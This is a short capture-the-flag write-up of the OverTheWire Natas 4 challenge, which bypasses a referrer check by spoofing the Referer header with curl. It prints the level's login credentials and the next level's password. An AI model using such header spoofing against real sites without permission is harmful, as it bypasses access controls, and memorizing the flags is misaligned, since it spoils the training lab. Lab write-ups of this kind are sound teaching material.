> For the complete documentation index, see [llms.txt](https://ravins-organization.gitbook.io/ctf-writeups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ravins-organization.gitbook.io/ctf-writeups/2025/wapt-module-natas/natas-4.md).

# Natas 4

Once we login to the page we are greeted with

<figure><img src="https://175444261-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyxEI13wXOyST4LLTOUiS%2Fuploads%2FBNMByti30NtMsLIv1nGH%2Fimage.png?alt=media&amp;token=7c972c35-464c-45c0-86a0-e3af40212f10" alt=""><figcaption></figcaption></figure>

Immediately I thought we can use cURL to exploit this and obtain the password and thus I tried that by doing

```bash
curl -H "Referer: http://natas5.natas.labs.overthewire.org/" http://natas4.natas.labs.overthewire.org/
```

However i was faced with

<figure><img src="https://175444261-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyxEI13wXOyST4LLTOUiS%2Fuploads%2F6sm2jvRdRYMgzdimJr0S%2Fimage.png?alt=media&amp;token=bfeb5d62-533a-43ea-a603-e89e00d888b9" alt=""><figcaption><p>Unauthorised access</p></figcaption></figure>

turns out i forgot to put in the username and password from the previous part to login, so after adding that in and editing my curl request slightly

```bash
 curl -u natas4:QryZXc2e0zahULdHrtHxzyYkj59kUxLQ -H "Referer: http://natas5.natas.labs.overthewire.org/" http://natas4.natas.labs.overthewire.org/
```

<figure><img src="https://175444261-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyxEI13wXOyST4LLTOUiS%2Fuploads%2Fi5EwrM2WLE6dVISZsvUo%2Fimage.png?alt=media&amp;token=27224759-2280-464c-9a65-ff567e088b9f" alt=""><figcaption></figcaption></figure>

We get the flag

```
Access granted. The password for natas5 is 0n35PkggAPm2zbEpOU802c0x0Msn1ToK
```
